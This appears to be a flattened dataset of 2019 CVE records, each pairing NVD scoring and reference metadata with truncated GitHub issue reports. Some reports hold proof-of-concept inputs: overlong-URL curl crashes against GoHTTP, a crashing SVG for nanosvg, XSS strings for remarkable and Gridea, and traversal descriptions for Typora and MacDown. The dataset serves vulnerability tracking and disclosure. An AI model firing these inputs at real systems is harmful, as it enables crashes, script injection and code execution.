"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jsummers/imageworsener/issues/30"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:entropymine:imageworsener:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E435E26A-659E-4A65-A6BF-1AA33DFE4D7B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"400"
] | 400 | https://github.com/jsummers/imageworsener/issues/30 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jsummers",
"imageworsener"
] | root@ubuntu:/home/hjy/Desktop# imagew oom-iwgif_init_screen1 imout/out -outfmt png
oom-iwgif_init_screen1 → imout/out
==12401==ERROR: AddressSanitizer failed to allocate 0x76eb4000 (1995128832) bytes of LargeMmapAllocator: 12
==12401==Process memory map follows:
0x08048000-0x0812c000 /usr/local/bin/imagew
0x0812... | memory exhausted in iwgif_init_screen | https://api.github.com/repos/jsummers/imageworsener/issues/30/comments | 1 | 2017-08-06T06:01:53Z | 2019-05-12T13:10:28Z | https://github.com/jsummers/imageworsener/issues/30 | 248,227,834 | 30 | 375 |
CVE-2017-12805 | 2019-05-09T16:29:00.327 | In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/664"
}... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.6-6:*:*:*:*:*:*:*",
"matchCriteriaId": "157776E9-D30D-48D2-B845-ED6315B8C5DC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"400"
] | 400 | https://github.com/ImageMagick/ImageMagick/issues/664 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ```
root@ubuntu:/home/hjy/Desktop# convert oom-ReadTIFFImage /dev/null
==27669==ERROR: AddressSanitizer failed to allocate 0x80002000 (-2147475456) bytes of LargeMmapAllocator: 12
==27669==Process memory map follows:
0x08048000-0x09714000 /usr/local/bin/magick
0x09714000-0x09715000 /usr/local/bin/magick
0x0971... | memory exhaustion in ReadTIFFImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/664/comments | 2 | 2017-08-10T05:00:53Z | 2019-05-10T01:41:54Z | https://github.com/ImageMagick/ImageMagick/issues/664 | 249,233,709 | 664 | 376 |
CVE-2017-12806 | 2019-05-09T16:29:00.373 | In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/660"
}... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.6-6:*:*:*:*:*:*:*",
"matchCriteriaId": "157776E9-D30D-48D2-B845-ED6315B8C5DC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"400"
] | 400 | https://github.com/ImageMagick/ImageMagick/issues/660 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ```
root@ubuntu:/home/hjy/Desktop# convert oom-format8BIM /dev/null
==8638==ERROR: AddressSanitizer failed to allocate 0x72e8d000 (1927860224) bytes of LargeMmapAllocator: 12
==8638==Process memory map follows:
0x08048000-0x0971a000 /usr/local/bin/magick
0x0971a000-0x0971b000 /usr/local/bin/magick
0x0971b000-0... | memory exhaustion in format8BIM | https://api.github.com/repos/ImageMagick/ImageMagick/issues/660/comments | 2 | 2017-08-08T03:28:18Z | 2019-05-10T01:41:26Z | https://github.com/ImageMagick/ImageMagick/issues/660 | 248,590,588 | 660 | 377 |
CVE-2019-11840 | 2019-05-09T16:29:00.607 | An issue was discovered in the supplementary Go cryptography library, golang.org/x/crypto, before v0.0.0-20190320223903-b7391e95e576. A flaw was found in the amd64 implementation of the golang.org/x/crypto/salsa20 and golang.org/x/crypto/salsa20/salsa packages. If more than 256 GiB of keystream is generated, or if the ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1691529"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/golang/go/issues/30965"
},... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FBA1D5EA-C8A7-40C2-9D8E-7E1ECF8ADE80",
"versionEndExcluding": "2019-03-20",
"versionEndIncluding": null,
"versionStartExcl... | [
"330"
] | 330 | https://github.com/golang/go/issues/30965 | [
"Third Party Advisory"
] | github.com | [
"golang",
"go"
] | If more than 256 GiB of keystream is generated, or if the counter otherwise grows greater than 32 bits, the amd64 implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to pre... | x/crypto/salsa20: keystream loop in amd64 implementation after 256GiB | https://api.github.com/repos/golang/go/issues/30965/comments | 3 | 2019-03-20T22:32:56Z | 2020-05-09T07:00:19Z | https://github.com/golang/go/issues/30965 | 423,501,989 | 30,965 | 378 |
CVE-2019-11870 | 2019-05-09T23:29:00.293 | Serendipity before 2.1.5 has XSS via EXIF data that is mishandled in the templates/2k11/admin/media_choose.tpl Editor Preview feature or the templates/2k11/admin/media_items.tpl Media Library feature. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2019/05/10/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://blog.s9y.org/a... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:s9y:serendipity:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D88431A4-EC0F-46BE-BD1C-C5EE98AE1B26",
"versionEndExcluding": "2.1.5",
"versionEndIncluding": null,
"versionStartExcludi... | [
"79"
] | 79 | https://github.com/s9y/Serendipity/issues/598 | [
"Third Party Advisory"
] | github.com | [
"s9y",
"Serendipity"
] | The attached file contains an XSS payload as the camera model EXIF tag.
Uploading it to s9y and looking at the details of the file will execute. The exif tag printing should be escaped. (While this is only self-xss, there are situations where this could still be exploited, imagine someone sending a photo to someone ... | XSS via exiftag | https://api.github.com/repos/s9y/Serendipity/issues/598/comments | 8 | 2019-03-07T14:35:55Z | 2019-04-27T10:58:15Z | https://github.com/s9y/Serendipity/issues/598 | 418,342,707 | 598 | 379 |
CVE-2019-11082 | 2019-05-10T16:29:01.673 | core/api/datasets/internal/actions/Explode.java in the Dataset API in DKPro Core through 1.10.0 allows Directory Traversal, resulting in the overwrite of local files with the contents of an archive. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/dkpro/dkpro-core/issues/1325"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dkpro-core_project:dkpro-core:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CAA6385C-9C36-437B-B006-D101506CD5AC",
"versionEndExcluding": null,
"versionEndIncluding": "1.10.0",
"vers... | [
"22"
] | 22 | https://github.com/dkpro/dkpro-core/issues/1325 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"dkpro",
"dkpro-core"
] | It should be ensured that datasets are only extracted inside their respective cache folder. | Avoid datasets being extracted outside their target directory | https://api.github.com/repos/dkpro/dkpro-core/issues/1325/comments | 0 | 2019-02-12T13:00:10Z | 2019-04-16T10:07:48Z | https://github.com/dkpro/dkpro-core/issues/1325 | 409,285,883 | 1,325 | 380 |
CVE-2019-12041 | 2019-05-13T13:29:02.243 | lib/common/html_re.js in remarkable 1.7.1 allows Regular Expression Denial of Service (ReDoS) via a CDATA section. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jonschlinkert/remarkable/issues/331"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:remarkable_project:remarkable:1.7.1:*:*:*:*:node.js:*:*",
"matchCriteriaId": "EBD1C278-8330-40CA-B276-F646A2419E00",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"1333"
] | 1333 | https://github.com/jonschlinkert/remarkable/issues/331 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jonschlinkert",
"remarkable"
] | If you guys are not familiar with this type of bug, here is the detail explanation:
https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS
Vulnerable line of code:
https://github.com/jonschlinkert/remarkable/blob/master/lib/common/html_re.js#L47
PoC
```javascript
var Remarkable = require... | [Security] Regex DoS vulnerability in parsing html tag | https://api.github.com/repos/jonschlinkert/remarkable/issues/331/comments | 3 | 2019-05-13T10:39:02Z | 2019-07-27T19:07:27Z | https://github.com/jonschlinkert/remarkable/issues/331 | 443,326,869 | 331 | 381 |
CVE-2019-12043 | 2019-05-13T14:29:01.987 | In remarkable 1.7.1, lib/parser_inline.js mishandles URL filtering, which allows attackers to trigger XSS via unprintable characters, as demonstrated by a \x0ejavascript: URL. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jonschlinkert/remarkable/issues/332"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:remarkable_project:remarkable:1.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DA15E926-6695-47EF-9683-D55988A8C0FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"79"
] | 79 | https://github.com/jonschlinkert/remarkable/issues/332 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jonschlinkert",
"remarkable"
] | Hi, check out this reported issue
https://github.com/jonschlinkert/remarkable/issues/227
Im able to bypass the bad url check, implemented here
https://github.com/jonschlinkert/remarkable/blob/master/lib/parser_inline.js#L146
```javascript
var Remarkable = require('remarkable');
var md = new Remarkable();
c... | [Security] bad url bypass, could lead to XSS | https://api.github.com/repos/jonschlinkert/remarkable/issues/332/comments | 6 | 2019-05-13T12:15:57Z | 2019-07-27T19:05:06Z | https://github.com/jonschlinkert/remarkable/issues/332 | 443,365,966 | 332 | 382 |
CVE-2019-12047 | 2019-05-13T15:29:03.613 | Gridea v0.8.0 has an XSS vulnerability through which the Nodejs module can be called to achieve arbitrary code execution, as demonstrated by child_process.exec and the "<img src=# onerror='eval(new Buffer(" substring. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/getgridea/gridea/issues/105"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gridea:gridea:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9CADBEF5-C0D0-4A47-8E33-3B54249DD491",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"79"
] | 79 | https://github.com/getgridea/gridea/issues/105 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"getgridea",
"gridea"
] | Hi, I found an XSS vulnerability that can cause RCE.
And I recorded a [GIF](https://imgur.com/a/KI8RQbg) to demonstrate controlling the local win10 through this vulnerability.
### Cause of vulnerability
The post content editing area does not filter or prevent the running of js script, resulting in the use of XS... | Vulnerability: XSS to RCE | https://api.github.com/repos/getgridea/gridea/issues/105/comments | 4 | 2019-05-13T05:48:39Z | 2019-07-15T09:30:09Z | https://github.com/getgridea/gridea/issues/105 | 443,215,763 | 105 | 383 |
CVE-2019-12101 | 2019-05-15T05:29:00.197 | coap_decode_option in coap.c in LibNyoci 0.07.00rc1 mishandles certain packets with "Uri-Path: (null)" and consequently allows remote attackers to cause a denial of service (segmentation fault). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/darconeous/libnyoci/issues/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gith... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libnyoci_project:libnyoci:0.07.00:rc1:*:*:*:*:*:*",
"matchCriteriaId": "3313B1A6-57C6-44FA-ACE7-B9E0C3CC41C0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"vers... | [
"476"
] | 476 | https://github.com/darconeous/libnyoci/issues/21 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"darconeous",
"libnyoci"
] | src/libnyoci/coap.c lines 58-116:
len = (*buffer & 0x0F);
switch((*buffer >> 4)) {
default:
if(key) *key += (*buffer >> 4);
buffer += 1;
break;
case 13:
buffer += 1;
if(key)*key += 13+*buffer;
buffer += 1;
break;
case 14:
buffer += 1;
if(key)*key += 269+buffer[1]... | There is a logical defect that causes a denial of service vulnerability | https://api.github.com/repos/darconeous/libnyoci/issues/21/comments | 6 | 2019-05-14T15:18:38Z | 2019-05-25T00:45:31Z | https://github.com/darconeous/libnyoci/issues/21 | 443,976,528 | 21 | 384 |
CVE-2019-1010258 | 2019-05-15T18:29:00.263 | nanosvg library nanosvg after commit c1f6e209c16b18b46aa9f45d7e619acf42c29726 is affected by: Buffer Overflow. The impact is: Memory corruption leading to at least DoS. More severe impact vectors need more investigation. The component is: it's part of a svg processing library. function nsvg__parseColorRGB in src/nanosv... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "josh@bress.net",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://0day.work/cve-2019-1000032-memory-corruption-in-nanosvg/"
},
{
"source": "josh@bress.net",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/memononen/nanos... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nanosvg_project:nanosvg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C22B5C89-A38B-4132-B90F-A58EEC770141",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"787"
] | 787 | https://github.com/memononen/nanosvg/issues/136 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"memononen",
"nanosvg"
] | This simple Proof of Concept
```svg
<stop style="stop-color:rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
```
crashes nanosvg.
In this snippet it is clear why this happens:
```c
#include <stdio.h>
#include <string.h>
static unsigned int nsvg__... | CVE-2019-1000032 - Memory corruption bug in nsvg__parseColorRGB | https://api.github.com/repos/memononen/nanosvg/issues/136/comments | 13 | 2018-11-16T15:09:47Z | 2021-09-03T18:25:59Z | https://github.com/memononen/nanosvg/issues/136 | 381,637,983 | 136 | 385 |
CVE-2019-12136 | 2019-05-16T03:29:00.673 | There is XSS in BoostIO Boostnote 0.11.15 via a label named mermaid, as demonstrated by a crafted SRC attribute of an IFRAME element. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/BoostIO/Boostnote/issues/3007"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:boostio:boostnote:0.11.15:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6F562F-BC2D-4DF8-BCAC-2DCCF3C29938",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"79"
] | 79 | https://github.com/BoostIO/Boostnote/issues/3007 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"BoostIO",
"Boostnote"
] | <!-- Issuehunt Badges -->
[<img alt="Issuehunt badges" src="https://img.shields.io/badge/IssueHunt-%2440%20Rewarded-%237E24E3.svg" />](https://issuehunt.io/r/BoostIo/Boostnote/issues/3007)
<!-- /Issuehunt Badges -->
# XSS
There is a xss in the newest version via a label named `mermaid`
When we insert codes like th... | A xss on the newest version | https://api.github.com/repos/BoostIO/BoostNote-Legacy/issues/3007/comments | 6 | 2019-05-14T03:56:09Z | 2020-02-16T17:43:47Z | https://github.com/BoostIO/BoostNote-Legacy/issues/3007 | 443,698,464 | 3,007 | 386 |
CVE-2019-12137 | 2019-05-16T14:29:00.310 | Typora 0.9.9.24.6 on macOS allows directory traversal, for execution of arbitrary programs, via a file:/// or ../ substring in a shared note. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "http://packetstormsecurity.com/files/153082/Typora-0.9.9.24.6-Directory-Traversal.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/typora/typora-issues/issues... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typora:typora:0.9.9.24.6:*:*:*:*:*:*:*",
"matchCriteriaId": "D21E894E-B778-4B69-A17A-1574E1BDB639",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"22"
] | 22 | https://github.com/typora/typora-issues/issues/2505 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"typora",
"typora-issues"
] | ## Summary
A local file path traversal issue exists in Typora version 0.9.9.24.6 (2400) for macOS which allows an attacker to execute arbitrary programs.
## Technical observation
A crafted URI can be used in a note to perform this attack using file:/// as an argument or by traversing to any directory like (../../... | Code Execution in Typora | https://api.github.com/repos/typora/typora-issues/issues/2505/comments | 3 | 2019-05-16T09:20:24Z | 2019-06-12T21:46:59Z | https://github.com/typora/typora-issues/issues/2505 | 444,845,103 | 2,505 | 387 |
CVE-2019-12138 | 2019-05-16T14:29:00.513 | MacDown 0.7.1 allows directory traversal, for execution of arbitrary programs, via a file:/// or ../ substring in a shared note. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/MacDownApp/macdown/issues/1076"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:macdown_project:macdown:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DE0D4A-C68A-41D7-885D-B543E72D72AD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | [
"22"
] | 22 | https://github.com/MacDownApp/macdown/issues/1076 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"MacDownApp",
"macdown"
] | ## Summary
A local file path traversal issue exists in Macdown version 0.7.1 for macOS which allows an attacker to execute arbitrary programs.
## Technical observation
A crafted URI can be used in a note to perform this attack using file:/// as an argument or by traversing to any directory like (../../../../someth... | Code Execution in Macdown | https://api.github.com/repos/MacDownApp/macdown/issues/1076/comments | 1 | 2019-05-16T09:58:31Z | 2019-05-16T17:33:59Z | https://github.com/MacDownApp/macdown/issues/1076 | 444,863,620 | 1,076 | 388 |
CVE-2019-12086 | 2019-05-17T17:29:00.483 | A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a cra... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.secur... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versio... | [
"502"
] | 502 | https://github.com/FasterXML/jackson-databind/issues/2326 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | A new gadget type (see https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062) was reported, and CVE id allocated was `CVE-2019-12086`.
CVE description is available at: https://nvd.nist.gov/vuln/detail/CVE-2019-12086 for full details, but the specific variation (in addit... | Block one more gadget type (mysql, CVE-2019-12086) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2326/comments | 12 | 2019-05-11T17:31:34Z | 2019-10-16T04:36:08Z | https://github.com/FasterXML/jackson-databind/issues/2326 | 443,018,345 | 2,326 | 389 |
CVE-2019-12158 | 2019-05-17T19:29:00.620 | GoHTTP through 2017-07-25 has a GetExtension heap-based buffer overflow via a long extension. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/fekberg/GoHttp/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/fekberg/GoHttp/issues/17"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA61125C-0405-4672-892D-3E198E9B895F",
"versionEndExcluding": null,
"versionEndIncluding": "2017-07-25",
"versionS... | [
"787"
] | 787 | https://github.com/fekberg/GoHttp/issues/17 | [
"Third Party Advisory"
] | github.com | [
"fekberg",
"GoHttp"
] | Screen -S Server
./GoHTTP
CTRL-A, D
Screen -S Crash
curl 127.0.0.1:4000/hi.htmlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
CTRL-A, D
ASAN Details:
==9376==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efbb at pc 0x000000402e44 bp 0x7
ffd9e6f3a70 sp 0x7ffd9e6f3a60
WRITE of size 1 at 0x60200... | Heap Buffer Overflow when appending certain size string to URL file extension when compiled with ASAN. | https://api.github.com/repos/fekberg/GoHttp/issues/17/comments | 4 | 2019-05-17T06:16:24Z | 2020-04-22T11:27:40Z | https://github.com/fekberg/GoHttp/issues/17 | 445,281,406 | 17 | 390 |
CVE-2019-12159 | 2019-05-17T19:29:00.680 | GoHTTP through 2017-07-25 has a stack-based buffer over-read in the scan function (when called from getRequestType) via a long URL. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/fekberg/GoHttp/issues/16"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/fekberg/GoHttp/issues/16"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA61125C-0405-4672-892D-3E198E9B895F",
"versionEndExcluding": null,
"versionEndIncluding": "2017-07-25",
"versionS... | [
"125"
] | 125 | https://github.com/fekberg/GoHttp/issues/16 | [
"Third Party Advisory"
] | github.com | [
"fekberg",
"GoHttp"
] | Screen -S Server
./GoHTTP
CTRL-A, D
Screen -S Crash
python -c "print 'A' * 50000" > file
curl 127.0.0.1:4000/$(cat file)
CTRL-A, D
Screen -R Server
==9330==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcea552b20 at pc 0x7fcfe397420b bp 0x
7ffcea552850 sp 0x7ffcea551ff8
READ of size 519 at 0... | Stack Buffer Overflow when requesting excessively long URL when compiled with ASAN. | https://api.github.com/repos/fekberg/GoHttp/issues/16/comments | 2 | 2019-05-17T06:11:38Z | 2019-05-24T19:00:10Z | https://github.com/fekberg/GoHttp/issues/16 | 445,280,173 | 16 | 391 |
CVE-2019-12160 | 2019-05-17T19:29:00.743 | GoHTTP through 2017-07-25 has a sendHeader use-after-free. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
